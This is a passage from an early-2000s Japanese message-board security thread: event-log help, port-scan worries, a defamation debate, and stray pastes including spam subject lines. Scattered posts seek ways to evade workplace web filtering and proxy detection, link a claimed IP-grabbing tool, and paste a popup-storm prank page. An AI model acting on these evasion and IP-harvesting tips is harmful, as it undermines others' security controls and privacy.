「不正アクセス行為から防御するため必要な措置を講ずるよう努める…」判った？法律くらい守れよ。

>>566
「彼は人殺しです」
これが事実でも名誉毀損？
「雪印食品は牛肉を偽装しました」
これも名誉毀損？じゃおれ告訴されるなあｗ

>>563
ないよ。
http://www.meti.go.jp/policy/netsecurity/fusei_access_law.htm

>>566
ヨウするに、細かいことを言えば送信側は不正アクセス行為なので
それを公然と事実を提示した結果、名誉を毀損されても仕方ないのだ。

これ以上はスレちがいなので↓でやってください
http://pc.2ch.net/test/read.cgi/sec/1012129357/

>>568
公益性がないだろ

>562
（名誉毀損）
第230条
公然と事実を摘示し、人の名誉を毀損したものは、その事実の有無に
かかわらず、三年以下の懲役若しくは五十万円以下の罰金に処する。

（直接509のケースにあてはまるかどうかは、自ずと別問題ですが。）

>>571
リンク先　ﾜﾛﾀ

…なら互いに訴訟しあえばいいってことで…終了？（笑

法律厨うぜーな
まさかMX使わないよな？彼らは

暇なのでつきあう。
名誉毀損について。
http://www.slis.keio.ac.jp/~ueda/sotsuron96/sonoda96-1.html

>>576
法厨じゃないけどねｗ
議論を殺伐と終結させるためには便利な手法だよ。

>>577 リンク先けっこう興味深いﾖ

まてまて、俺が飯食ってる間に変な話になってんな？
509出てきてねーじゃん。
もう、終結でいいだろ。
終冬

>>576
法厨つか、どこまでやるとﾔﾊﾞｲかを把握しとかないと、すぐﾀｲｰﾎだからね。

送信者にウイルスを送る権利はない。
受信者はそのメールを合法的に手に入れた。
送信者のPCから不特定多数のPCに対して送信が行われたので、メールの存在と送信者の存在自体は公の情報と解釈される。
受信者は危険なウイルスが見知らぬ人物から送られた事で精神的苦痛を受けた。
ウイルスの感染を助長した送信者の行為は社会的活動を妨げる。
よって受信者が送信者のメアドを晒す事は名誉毀損にはならない。

>>582
あのね、過失によるウィルス送信を罰する法律はないだろ。そんなもんあったら
全世界中犯罪者だらけだ。
んでもって刑法第230条の2　
> 1，前条第一項の行為公共の利害に関する事実に係りその目的専ら公益を図るに出
> たるものと認むる時は事実の真否を判断し事実なることの証明ありたるときは
> 之を罰せず。
> 2, 前項の規定に適用については未だ公訴の提起せられさる人の犯罪行為に関する
> 事実は之を公共の利害に関する事実と看さす。
> 3, 前条第一項の行為公務員は公選による公務員の候補者に関する事実に係るときは
> 事実の真否を判断し真実なることの証明ありたるときは之を罰せず。
晒すことで公益を図るわけじゃない、犯罪行為を晒しているわけでもない、公務員じゃない。
>>509はPCに関して無知だったが、晒した奴は法律に関して無知だったというわけだ。

>>583
国外では既知のセキュリティホールに未対処だった企業が、「よくもウイルスばらまいてくれたな！」、なんて感じで訴えられたケースがありましたね。

日本国内ではどうなのか、知りません。
でも何度もメール送ってもNimdaやBadtrans送ってくる企業に、「あなたよりも上の人と、訴訟を視野に入れてもっと詰めた話をしたいんですけど」、なんて連絡すると即日対処しますね、みんな。

刑法はわかりませんけど、何度も警告しても改善が見られないケースでは、民事では賠償金を取れると思います。

>>583
ヴァカかおまえは？
ウイルスの送信は受信者の利益を害する行為だ。
そして送信者が不特定多数に送信したとすれば、公共の利害に関する事実だ。
ウイルスが蔓延してる事実を公に知らしめなければ誰もウイルスの対策をしないだろ。

>>586
ウィルスに感染したHPを毎日公表してるサイトもあるしなあ。
ウィルスに感染したメールアドレスを晒してもそれと同じだと思うが。
そもそも親告罪だし告訴したきゃすればいい。

まぁ、カリカリすんなや。５０９の馬鹿もお礼も言わず
帰ってもこないし、カリカリしてもしょうがないＺＥ？
マターリしようよ。

>>588
509は>>548で首吊りました。

>>586
晒した張本人かな? ビビッて晒すの中断するなよ。

ウィルスに感染してそれをさらに撒いてしまった者を取り締まる法律はないんだから、民事で賠償請求すりゃいいだろ。
一方晒した方の名誉毀損は刑事と刑事両方いけるぞ。

> ウイルスが蔓延してる事実を公に知らしめなければ誰もウイルスの対策をしないだろ。
それを個人が勝手にやることをリンチって言うんだよ。

>>590
(((；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>591
リンチしたい☆

相手のパソコンを攻撃するにはどうすればいいですか？

>>594
相手のパソコンはノート型か?

>>593
自分のパソコンを思い切り相手のパソコンに投げつける。。

始めまして。
ここの住民の皆様にお聞きしたいのですが、
Windows2000 Proで、自分のマシンに接続してきたマシン名とユーザー名などを
ログとして残すことはできますか？
もし、Windows2000標準のツールでできないことなら、そういったソフトがあれば
紹介していただけないでしょうか？
どんな些細なことでも結構ですので、よろしくお願いします。

>>596
監査ポリシーで設定汁〜〜〜〜〜

　

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><HTML><HEAD><META name="GENERATOR"
content="IBM WebSphere Homepage Builder V6.0.2 for Windows">
<META http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<META http-equiv="Content-Style-Type" content="text/css">
<META HTTP-EQUIV="CONTENT-SCRIPT-TYPE" CONTENT="text/html; charset=Shift_JIS">
<META name="GENERATOR" content="IBM HomePage Builder 2000 V4.0.6 for Windows">
<TITLE>windowストーム</TITLE>
<!--IPT LANGUAGE="JavaScript"
window.open()
window.open()
window.open()
</SCRI-->
</HEAD>
<BODY BACKGROUND="k.jpg">
<FONT COLOR="#CC6600"><B>スーパーwindowsuストームです。
ミルクハウスさんの「危険なページ」を<P>
クリアしてないとこの画面を見ることは相当ないでしょう。
クリア出来たら掲示板にカキコしてください。<P>
ちにみに、ここでは100このWindowを開きました！
<P>

</B></FONT>
<BR>

保守。

（・∀・）age

くだらない質問するヤツは自分の質問がくだらないことに気づかないことが多い。

↑
くだらないカキコをするヤツは自分のカキコがくだらないことに気づかないことが多い。

↑
くだらないカキコに反応するヤツほど自分のカキコのくだらなさに気づかないことが多い。

↑
くだらないカキコを認めたヤツほど自分のくだらなさに気づかないことが多い。

(・д・) sage

あがってんぞ〜おぃ♥

なんだかMypartyっていう新ウィルスが出たみたいだから
しっかり対策を取った上でちゃんと気をつけてね

☆ウィルス情報＆質問　総合スレッド☆
http://pc.2ch.net/test/read.cgi/sec/1010948022/l50

sageつつ、くだらない質問をさせてください。
踏むと生IPが表示されて、かつ、過去に踏んだやつの一覧が出るサイト
ってどこでしたっけ？

イベントの種類: 失敗の監査
イベント ソース: Security
イベント カテゴリ: ログオン/ログオフ
イベント ID: 529
日付: 2002/01/28
時刻: 12:49:47
ユーザー: NT AUTHORITY\SYSTEM
コンピュータ: **********
説明:
ログオンの失敗:
原因: ユーザー名が不明またはパスワードが無効です。
ユーザー名: VAIO
ドメイン: WORKGROUP
ログオンの種類: 3
ログオン プロセス: NtLmSsp
認証パッケージ: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
ワークステーション名: \\PCG-XR_Z SERIES

と

イベントの種類: 成功の監査
イベント ソース: Security
イベント カテゴリ: ログオン/ログオフ
イベント ID: 538
日付: 2002/01/28
時刻: 19:15:19
ユーザー: NT AUTHORITY\ANONYMOUS LOGON
コンピュータ: **********
説明:
ユーザーのログオフ:
ユーザー名: ANONYMOUS LOGON
ドメイン: NT AUTHORITY
ログオン ID: (0x0,0x390680)
ログオンの種類: 3

は、それぞれどういう意味？？？

会社などでWebSENSEに引っ掛からないようにするには、どうすればいいか知っている方いませんか？
以前なんかの雑誌でそういうサイトが載ってるって聞いたんですが

掲示板までWebSENSEで見れなくするのは止めて欲しいなあ。
自分のHPの掲示板が、見れないのはへこむよなぁ

>>611
会社のPCを私用に使うのはやめましょう

>>612
バレなきゃいいんじゃない? (w

>>613
会社のサーバのログには確実に残るが・・

>>610
イベントID 529 は、ユーザー名かパスワードが違うためにNTLM認証
に失敗した場合に発生します。この場合にはvaioというユーザーが
\\PCG-XR_Z というコンピュータにログオンしようとしてエラーとなっ
ています。ログオンの種類=3であることから、ネットワークから、この
コンピュタ（**********）にアクセスしてきたことがわかります。

イベントID538 は、ログオフの監査により発生したイベントで、正常
にログオフが完了したことを示しています。これに対応する528という
ログオンイベントも、どこかにあるはずです。ANONYMOUS LOGON は、
リモートからコンピュータ***********をなんらかの管理ツール等で
触った場合に表示されます。

　ノートンアンチウィルス2002を購入したのですが、
パッケージには”2001年版も同梱”と書かれてたのですが、
箱の中には、2002の説明書（黄色で聴診器の図）と登録用
ハガキ、CD-ROM1枚（2002と書いて有る）の３つしかあり
ませんでした。2001年版は、入ってなかったのですが、他
の方はどうでしたか？

>>615
詳しいご説明ありがとうございます。
要は、自分のパソコンに誰かが入ってこようとしたけど、パスが違って
入れなかった人がいて、逆に入れた人がいるってことですね。
でも、こんなイベントログが多数あります。常に狙われているってことでしょうか？

また、ログオンの種類=3は、ネットワークから自分のコンピュータにアクセスしてきたことで、
その他の種類というのはあるのでしょうか？

それから、このログをもとに接続してきた相手を特定することはで可能ですか？
なんだか、こんなログがたくさんあって怖いです。

>>617
いま読み直したら、ちょっと間違えていました。すいません。
\\PCG-XR_Z で vaioというユーザーが、xxxxxxxにネットワークログオン
しようとした..というのが正しいです。
ログオンの種類は、ほかに、
0：未使用
1：未使用
2：対面ログオン（マシンに直にログオン）
3：ネットワークログオン
4：スケジューラサービスによるバッチログオン
5：サービスとしてのログオン
6：プロキシログオン（よくわかりまへん）
7：Unlock Workstation（よくわかりまへん）
があります。わからないところがありまして、お恥ずかしい。
これ、会社のPCですか？自宅で、かつ1台しかない環境だとすると、
ちょっと怖いですね。w2kproかntwsですよね？pppでしたらログが
取れますので、一度採取してみてはいかがでしょう。

>>617
とりあえず、WINSクライアント（NetBTクライアント）をダイアルアップ
ネットワークからバインドをはずしたらいかがでしょう。

>>616
CD-ROMの中に入ってます。

>>620
　じゃっとですか、あたいげんのはやとちぃじゃしった！
まこて、あいがとごわした。

起動直後にフロッピーディスクに盛んにアクセス。
IEのお気に入りの特殊アイコン（２ｃｈやｇｏｏｏｌｅ）
が元に戻っていました。
これは何かのウイルスでしょうか？

ＷｉｎｄｏｗｓＸＰ、ＩＥ６です。
アンチウイスルソフトはノートン一式です。
（ノートンには何も反応なし）

>>622
ウィルスじゃないとおもうからWindows板逝け

609さん、いろいろお気に止めていただき、ありがとうございます。
このマシンは、自宅のマシンで、OSはWin2KPROを使っております。
ちょっと、諸事情によりまして、24時間稼働中のマシンです。
また、自宅にはこれ1台しかない僕の大事なデータが入った大切なマシンです。
会社のノートパソコンをもって帰って、LANで繋げたりはしています。

最近、ログを取るということをいっちょまえに覚えまして、ログをとる設定をしたところです。
そうすると、毎日のようにあのようなログが残っていき、最初はネットだから、
こういう事もあるんだと楽観的に考えていましたが、最近は少し気になるようになり、
この掲示板にて質問をさせていただいたといういきさつです。

教えていただいたログで侵入がされているようですが、あのようなログが多数見られます。
かといって、壊されたファイルとか何かされたっていう感じはありません。
ただ、侵入して何かをどこかにコピーされてたりしたら、こちらでは何があったかは分かりませんが。

で、また質問がいくつかあるのですが、よろしいですか？
まず、パスワードについてですが、一応僕のマシンにはパスワードをかけています。
多分、普通に考えたら分からないパスワードなのですが、この親友されたときっていうのは、
パスワードが解析されたって事なのでしょうか？
そこで疑問がわくのですが、パスワードなんてそう簡単に解析できるものではないと思います。
少なからず、1度はログオンに失敗すると思うのですが、侵入されたログのあたりには失敗したログはありません。
時々失敗しているログはありますが、それも数えれるくらいです。
侵入時にはこのパスはちゃんと効いてるのでしょうか？

次に、このログはハードディスクのどこかに格納されているのだと思いますが、それはどのファイルなのでしょうか？
また、侵入されたとき証拠を消すためにそのファイルを消すことは可能なのでしょうか？
それをされていると、もう、どんな事があったか検討がつかなくなります。

また、このログを見てみると、侵入に失敗したときは相手のユーザー名等が記録されていますが、
成功したときは、AUTHORITY\SYSTEMとなって、誰が侵入してきたかが分かりません。
誰が侵入してきたかという詳細なログを取る方法はありませんでしょうか？
もしくは、そういったソフトがありましたら、教えて下さい。

今、やりたいことは侵入してきた相手を特定して、侵入してきただろ！！ってメールでも送ってやりたいです。
可能ですか？

いろいろ書きましたが、もしよろしければご教授お願いいたします。

こんばんは。この板の方に教えていただきたいことがあります。
昨日からウィンドウ画面の上下キー、□の最大、最小、ｘなどが
全て２とか０とか５とか６の数字で出て記号表示も一部がおかしく
なりました。これもウィルスの症状でしょうか。

>>625
バーカ

http://homepage2.nifty.com/winfaq/

６２６さんありがとうございます！
助かりました。次からは他の原因も調べてから出直します。
では。

簡単なウィルス付のデータを有料メルアドに送ると
除去されると言うのは本当ですか？

トロイにやられてしまいました。
で、ニュートン先生の指示通りレジストリエディターでＲｕｎ等から
削除したのですが、トロイのファイル自体が消せません。
それ以来、ファイアーウオールのログを常に見ながらネットしてるのですが
いまのところ不正アクセスは無しです。
やばいですか？
ニュートン先生の「トロイ入ってもアクセスはブロックするよ」ってのは
信用してはいけませんか？
出先なのでトロイの型番わかりませんが、Ｔｒｏｊ＿Ｓｕｂの旧式だったと
思います。ニュートン先生のほうが新しいのですが。
再インストしたほういいですか？

ニュートンは偉大だな〜

ダーウィン先生にも１票！（≧∇≦）

いま、インターネットリバーシをやろうとしたら、www.zone.com.-ad.asp
をダウンロードしますかっていう画面がでたんですけどダウンロードしても
大丈夫なんでしょうか？
いままでは、そんな画面は、でなかったんですけど

>>628
サーバでウィルス除去してくれるサービスに入ってたらしてくれるだろうな

>>629
トロイ入ってるからって外部からアクセスされるわけじゃない。
簡単に言うとトロイには外部から動かすやつ（内部ではＬｉｓｔｅｎしてる）と内部からコネクションはりにいくやつがある。
netstat -a でもして変なプログラムがListenしてないか調べる

消せないってファイルはあるけど拒否されるってこと？
それなら起動ディスクで立ち上げて削除するなりしてください

>>６３３
ありがとう、やってみます。
バックドアってほんといや・・・

>>624
とりいそぎ。
systemアカウントがログオンに成功している場合には、問題ないはずです。
これは、サービスが使用しているアカウントですので、心配しないで大丈夫です。
SP2以降で、systemアカウントの詐称に関するセキュリティホールは聞いたことは
ありません。いまのところ。
これ以外で見慣れないアカウントがログオンに成功していると、アレですね。
イベントログ自体は、eventlogサービスでつかまれているので、削除することは
できません。削除できたとしても一括削除のみですので、一部のみ削除ということは
不可能です。また、削除には管理者権限が必須になりますので、ここがやぶられない
限りは大丈夫です。SP2があたっているのであれば、いまのところ、ここに関する
セキュリティホールはみたことがありません。
netbiosが外部に公開されているのは怖いですね。NBTを無効にしてしまいましょう。
また、機会があれば、標準で添付されているネットワークモニタをしようして
キャプチャしてみてください。
なお、監査は、ログオンログオフだけでなく、ディレクトリ関連をすべて有効にして
おいたほうがよいです。

ファイアウォールソフト「アウトポスト（フリー版）」を導入したら、
A Boneで２ちゃんねるを閲覧することができなくなりました。
解決するにはどうしたらよいのか教えて下さい。

>>629-631で話題のニュートン先生はどこで手に入りますか？

Received: from cc.sookmyung.ac.kr (203.252.201.4) by sitemail.everyone.net with SMTP; **
Received: from vv68gIjB6 (localhost [127.0.0.1]) by cc.sookmyung.ac.kr (8.9.3/8.9.3) with SMTP id ** (KST)
From: [email protected]
Date:**
Subject: Need Help? Benefactored Program...hurry don't miss out!
---
Hello Friends,
If you need HELP and would like to be benefactored
into a new FABULOUS
program, please let me know right away!! I will put
you into a
"temporary" matrix to hold your position until the
company allows us to enter
people on Feb. 4! The overflow will be enormous.
Please reserve your
spot now!
Send your info to
[email protected]
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to me [email protected]
---
egret.sookmyung.ac.kr (pri=20)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。
-----
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;
> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
< 250 < http://www.nanet.co.jp/rlytest/[email protected] >... Sender ok
> RCPT TO:<[email protected]>
< 250 <[email protected]>... Recipient ok
> QUIT
< 221 cc.sookmyung.ac.kr closing connection
問題あり：不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

>>637
たぶん、ここ。
http://www.newtone.co.jp/frame_japanese.html

　ポートスキャンについての質問があります。
それをやられた相手はかけられたことがわかるのでしょうか？
よろしくお願いします。

>>640
検知ソフトなどが入ってたらわかるし、入ってなければ普通は気づかない。

>641さん
即答、ありがとうございました。

http://myhome.hananet.net/~crazyghost/goto.htm

これってウイルス？
さっき誰かが言ってた。

FTPサイトへの連アタって、ログインできずに、サーバダウンさせなくとも
犯罪になるのでしょうか？

ちなみにゲストログインOKなところですが。

すんな。
もっと有意義なことに時間使えよ、、

>>647

ちがいます。間違えてしてしまったということです。30回程度ですが。

>>644
言ってたならウイルスだろ

>>648
なら気にするな

age

http://www.geocities.co.jp/SiliconValley-Cupertino/9822/mysoft/files/madoka08.zip


ついさっき、知らずに↑踏んじゃったんですが、ヤバイですか？
ヤバイっていわれたんで、何かいい方法があったらおしえてください。

宜しく御願いします

>>644
女がフルスクリーンで出てきてキャーって言うだけ。無害だﾆｮｰﾝ!!

>>652
ZIPファイルだから解凍して実行しなければＯＫ

つーか↓これです
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A

>654
ありがとう！　とりあえずファイルはｺﾞﾐ箱にﾎﾟｲってしたんですが・・・。
会社のﾏｼﾝなんで心配ｯｽ･･･

ありがとうございます。
ほっとしました。

[email protected]とW32.Badtrans@mmは違うんですか？
[email protected]に感染したらしく、手動で除去したんですけど。

IDで、????と出すにはどうすれば良いんでしょうか？
串通して書き込んでもＩＤは表示されるんですが、

それと書き込み時の串の判定を突破するのはみなさんそんなに簡単なんでしょうか？
ちょろいちょろいとか言われちゃったんですが俺は一時間かけてあーでもないこーでもないといちいち試しながら探してるんですが・・・
それとも他に方法があるんですか？

>>659
メアド欄に何か書けば良いんじゃ無いの？変わった？
串に関してはJavaScriptって知ってる？

／￣￣￣￣￣￣￣￣
|　・・・・・
＼　 ＿＿＿＿＿＿＿
　 Ｖ
∧ ∧
( ﾟДﾟ)￣￣　｀〜
　U U￣￣UU

ははは

え？え？漏れ蔑んだ目で見られてるの？
何かマズイ事言った？モノスゴイ不安・・・

>>660
JSは串と関係無いからかと

串関連で一番使えるサイト
http://www8.big.or.jp/~000/CyberSyndrome/

>>660
その串判定を突破する方法を教えてちょ？

>>664
>>660が知ってるとは思えないが、自動設定スクリプトという機能があるから、
串とJSは無関係というわけでもない。

Received: from cc.sookmyung.ac.kr (203.252.201.4) by sitemail.everyone.net with SMTP; **
Received: from vv68gIjB6 (localhost [127.0.0.1]) by cc.sookmyung.ac.kr (8.9.3/8.9.3) with SMTP id ** (KST)
From: [email protected]
Date:**
Subject: Need Help? Benefactored Program...hurry don't miss out!
---
Hello Friends,
If you need HELP and would like to be benefactored
into a new FABULOUS
program, please let me know right away!! I will put
you into a
"temporary" matrix to hold your position until the
company allows us to enter
people on Feb. 4! The overflow will be enormous.
Please reserve your
spot now!
Send your info to
[email protected]
If you no longer are looking to generate wealth,
we will remove you from our database
just put "Remove from database" in subject line and
email to me [email protected]
---
egret.sookmyung.ac.kr (pri=20)
接続に失敗：ネットワークが混雑しているか、サーバが停止している可能性があります。
-----
cc.sookmyung.ac.kr (pri=10)
< 220-InterScan Version 3.6-Build_1166 $Date: 04/24/2001 22:13:0052$: Ready
< 220 cc.sookmyung.ac.kr ESMTP Sendmail 8.9.3/8.9.3;
> HELO rlytest.nanet.co.jp
< 250 cc.sookmyung.ac.kr Hello localhost [127.0.0.1], pleased to meet you
> MAIL FROM:< http://www.nanet.co.jp/rlytest/[email protected] >
< 250 < http://www.nanet.co.jp/rlytest/[email protected] >... Sender ok
> RCPT TO:<[email protected]>
< 250 <[email protected]>... Recipient ok
> QUIT
< 221 cc.sookmyung.ac.kr closing connection
問題あり：不正な中継を受け付けます。
(203.252.201.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

>>667
ウザ

　　　　

>>666
そこまで読むか・・・・

2002/01/31(木)
SRX7E/P
ようやく正式発表されました。やっぱりメモリの増量と OS の変更だけ。購入意欲に対するパンチが弱いですね。
でよく考えてみるとメモリは 128MB MicroDIMM の追加だし、OS は HDD にセットアップするだけですよね。ということは SRX7E/P って SRX7 と同じ基盤＆機器？
基盤に一切の変更を加えず、ソフトウェアのバージョンアップとメモリモジュールの追加しか行われていないなんて。
春モデルはやっぱりパスして夏モデルに逝こうかな。
[15:00 追記]初心に返って考え直してみて、「そういや 128MB MicroDIMM を追加して、
OS を WinXP Pro に変更して価格据え置きって結構努力したのかもなぁ」 って思えてきた。
でも期待していた VAIO ファンの声っていうのはPentiumIII-M 850MHz＋40GB HDD なんだよなぁ。

>>669
しょっちゅうちがうだろが、チンカス！

>>666
フォローかと思ったらダメ出しかよ
でも半分正解、そのつもりじゃ無かった
JavaScriptとJavaApplet間違えた...JavaAppletでtelnet...
マズイ事言ってるわ＜漏れ

飲んでー飲んでー飲まれてー飲んでー
飲んでー飲み潰れて眠るまでー
飲んだ時はレスしない、腹かっさばいて眠ります

　

[1993] べつにいいじゃないですか！！　投稿者： ＳＹＯＪＩぞなもし　投稿日：2002/01/31(Thu) 22:33
MTさん
８１でも８４でも良いじゃないですか！！チャーチなんだからヽ(*^。^*)ノ
松本は良い街ですよね。SYOJIとしましてはクラシック音楽の街、そして自転車天国でもありました。
今回靴の洞窟であったことも判明しましたので、なんとしても業務上の用件をでっち上げなければなりませぬ。

スコービラビラはそんなによいのでしゅか！！！
でも歳なので何回も逝けないないのよん♪
回数よりしつこい一発になっています←当然エロネタです＜（｀＾´）＞
ゆうすけさん
死んでますか？？？？
入れっぱなしなのでしょうか？
果て過ぎたのでしょうか？？？？
相手は誰ですか？
Ｆ美さんとか（笑）

>>674
さぁねぇしりません（ぷ
おまえこそいくちゅでちゅか？

vigilのようなSnifferを使っているNodeを検出できるソフトって、どっかに無い？

>>676
さぁねぇしりません（ぷ
おまえこそいくちゅでちゅか？

　????はわかりました　これから試してみます
　サイバーシンドロームはよくお世話になってます
　で、そこで探した串を診断くんで？判定でてるのに、ここでは突破しなかったり
　突破するからおろ？っと思って診断くんかけたらＥ判定だったり・・・
　いまいち書き込み突破条件がわかりません

　やはりみなさん手作業で探してるんですね＾＾；
　がんばるしかないか・・・・・

>>609=635さん
いろいろとアドバイスありがとうございます。
取り合えず、知らな間にログオンされている情報が、
システムの情報で安心しております。
やはり、ログオンしてきているほかのユーザーは、
ログオンに失敗している人たちだけなのですね。
一応、パスが効いてシャットアウトしているということですよね。
いやぁ、ホントに安心しました。

一応、うちのマシンにはSP2をあてているので、セキュリティ上、
問題ないということですね。
それから、ひとつ疑問があるのですが、ログオンに失敗している人たちは、
インターネット上で僕のマシンを見つけたということですよね。
どうやって見つけたのでしょうか？
間単に見つかるのなのですか？

あと、ネットワークモニターというのはどうやって使うのでしょう？
使い方がまったくわかりません。
それから、NBTを無効にということですが、NBTとはいったいなんですか＞
質問ばかりで申し訳ありません。

>>676
さぁねぇしりません（ぷ
おまえこそいくちゅでちゅか？

おい！
EVERYDAY PEOPLEはどうなったんだ？？

くだらんことですみませんが
ＩＰ抜いてメールしてみてくれませんか？

しばらくお休みだとさ＞682
ttp://members.jcom.home.ne.jp/sarasiru/nikki.html#2002_1_29

メールアドレスからその人についてどんなことがわかりますか？
また、そういったことが調べられるサイトはありますか？

>>685
その人の入っているプロバイダぐらいだな

ウィルス感染しちまったのですが、ひどいんです・・・
自分自身のフォルダに、ウィルスメールを送りつけまくる。nimdaなら容量が
決まってるじゃないですか。ところがこいつは、各フォルダの容量ごとに変わる。
ネットにつなげない、ウィルス対策をしてなかったので（あはははは）、オンライン
チェックしたくても、ウィルスソフトを使おうにも、使えん。
どーしたもんでしょ

>>687
つらいのは分かるがマルチはいかんな

本当にくだらない質問ですが、Whoisにある“現在の検索先”は
入力したIPが現在どのIPを偽装してるか調べられるんでしょうか？

age

あ、偽装してるIPではなくて偽装してるIPのドメインの間違いでした……。
もしかしてものすごく勘違いな事言ってますか？

すいません。勘違いでした。逝ってきます。

つまらん

Windowsを起動する度に
Remote Address :224.0.0.22
にIEやスタートアップに登録されているアプリが
いつも、アクセスします。
このアドレスを調べてみたのですが何のアドレスか分かりません。
何が原因でアクセスするのか、教えてください。

RIP

>>695
http://www.iana.org/assignments/ipv4-address-space
224-239は マルチキャストアドレス
おそらくUPnPがつかっている。

今さらノートンｲﾝﾀｰﾈｯﾄｾｷｭﾘﾃｨ2001入れたら、起動時にＣドライブやＤドライブの
フォルダが開きます。どっちかだけ開く時もあれば、開かない時が。
なんなんでしょ？？

>>698
マルチはやめようよ。誰も答えてくれなくなるよ。

>>698 ﾏﾙﾁ氏ね

TCP 80 が開いてるそうなので、閉じたいんですが、
どうやれば良いんでしょう？
昨日までは閉じてたのに。
Win98SE, Outpostを使ってます。

>>701
立ってるWWW鯖へし折る。

>>702
WWWサーバーとか無いつもりなんですが。
何かがサーバー的動作をしているんでしょうか？

>>703
IISでも動いてんじゃないの？
”管理”で確認するが良いさ。

ルーター入れて、始めて気づいたんだけど
接続を切るにはどうしたら良いのかな？

>>705
ケーブルを引っこ抜けば？

やっぱそれしかない？

Bellsouth.net, Inc. (NETBLK-BELLSNET-BLK5)
301 Perimeter Center North, Suite 400
Atlanta, GA 30346
US

Netname: BELLSNET-BLK5
Netblock: 216.76.0.0 - 216.79.255.255
Maintainer: BELL

Coordinator:
Geurin, Joe (JG726-ARIN) [email protected]
678-441-7800 (FAX) 678-441-6968

Domain System inverse mapping provided by:

NS.BELLSOUTH.NET 205.152.0.5
NS.ATL.BELLSOUTH.NET 205.152.0.20

ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE

216.78.203.108からポート6699に対するアタックを受けた。
この前もアタック受けたけど恨みでもあるのかな？

>708
君が固定IPでなかったら、多分そのIPでMXやってた奴がいる。

７１０にかんれんしてだが、port6699にアクセスしようとしてくるやつが多すぎる。
じぶんはMXやってないし、怖くなって何回か接続詞しなおしたんだが一時間に１５０回くらい
あくせすがくる。いろんな人から。
なんか変なウィルスでもはやってる？

>>710
やってなくてもポートスキャンは来るよ

>709
愚痴みたいな書き込みにレスサンクス！

固定じゃないよ。でもこの前もあったからな・・・。
偶然なのかどうか。
今このポートにアクセスかけてくるのはやっぱMXがらみなのかな？
ポート6699はトロイにも使われるって聞いて怖いんだけど。

今までなかったよ。急に突然。
でＩＣＱでともだちにきいたらそいつは３０分で５０００かいほどきてるんですと。

>>712
固定じゃないからだよ。
つまりあなたのIPアドレスをその前に利用していた人がMXをやっていて（以下略

他でも書き込み見た。
6699にアクセスかけられた人おいでませ。
最近多いのか？

ポート6699を無作為に検索して、MXクライアントがあがっているか探すような
スクリプトは、あるな。
もちろん、MXユーザの違法性を糾弾する目的にも、MXのセキュリティホール
をつつく方法にも、そして、スパイウェア的な
トロイを呼ぶ用途にだって使えるだろう。それについてはよく知らないけど。
6699が閉まっているんだったら、いちいちポートスキャンに
目くじら立てることはない。

http://plaza29.mbn.or.jp/~syuuki/prog/Yarinige.lzh
　　　　これ使えば人のサイトのIP抜ける！

これ使っかてＩＰ抜く人とかいるのですか？

>>717
そんなの使わなくても検索機能付の掲示板ならIP分かる場合があるよ。ログ取ってれば。

例えばKentWebのYYBBSとか・・
http://www.kent-web.com/bbs/guest/guest.cgi

>>717
怪しいソフト・・

>>717
それポートスキャンのツールですよね。
それだけで人のサイトないのIP抜けるものなんですか？
ちなみにサイト管理者ですけど

>>717
いると思うがサイトのIPアドレスが分かったところで何のメリットが？

ポートスキャンだけで素人がIP抜けるものでしょうか？
教えてください。怖いです。
IP抜く人はみんなポートスキャン使っているのですか？

[email protected] Re: 30 Jan 10:02 40KByte
[email protected] Re: 31 Jan 00:14 40KByte
[email protected] ！広告！＼＼＼＼マニア市場／／／／／／ 26 Jan 03:24 1306Byte
[email protected] ！広告！■■■■アイコラ友の会■■■■■■■■ 27 Jan 13:12 1206Byte
[email protected] ！広告！■■■■アイドル受験戦争■■■■■■■■■■■■■ 27 Jan 14:55 971Byte
[email protected] ！広告！うちの妹、女子校生なんだけど隠し撮りしちゃた。 25 Jan 14:35 1087Byte
[email protected] ！広告！このサイト知ってる？知らないとヤバイよ！ 29 Jan 06:35 842Byte
[email protected] ！広告！どう？オナニーしてる？ 24 Jan 12:42 1469Byte
[email protected] ！広告！アイコラって言ってもピンきりあるよね。 23 Jan 22:39 971Byte
[email protected] ！広告！コングラッチュレーション!!! 23 Jan 10:43 1044Byte
[email protected] ！広告！モロ大量入荷、 28 Jan 00:26 971Byte
[email protected] ！広告！今年こそネットで××フ レンドを 24 Jan 01:34 2494Byte
[email protected] ！広告！昨日から今日にかけての女の娘の部屋の盗撮画像を 29 Jan 02:04 833Byte
[email protected] ！広告！友達がこの前渋谷行った時に 23 Jan 17:36 898Byte
[email protected] 【★gooまんが特集★】gooアナウンスメール No.30[2002/1/30] 30 Jan 18:45 0Byte
[email protected] 【★報道写真展『宇宙への旅編』★】gooアナウンスメール No.29[2002/1/23] 23 Jan 16:13 0Byte
[email protected] ベルナール

>>722
ポートスキャンをかけられた
という時点で相手にIPアドレスが分かってますが

IPアドレスがばれてなかったらポートスキャン
かけられてもアドレスはばれないのですね。
安心しました。

？

ＩＰアドレスわからないでどこにポートスキャンかけるの？

>>727
ポートスキャンの意味しってんのか？
ipアドレスわからないからスキャンすんだよ（ｗ

【1:1】ノートンアンチウイルスがおかしいです。
1 名前：イタイ 02/02/03 04:03 ID:oU9nxv9H
何度再インストールしてもダメです。
アンインストールもダメです。
アンインストールもできません。
フォルダいじってもダメです。
実行したら１分たたないうちに自然に終了です。
ハードディスクが廻っています・・・
泣けます。
助けてください。
ネットに繋ぐのは痛いです。

の者ですが。
原因はエロのスクリーンセイバー落としてからおかしくなりました。
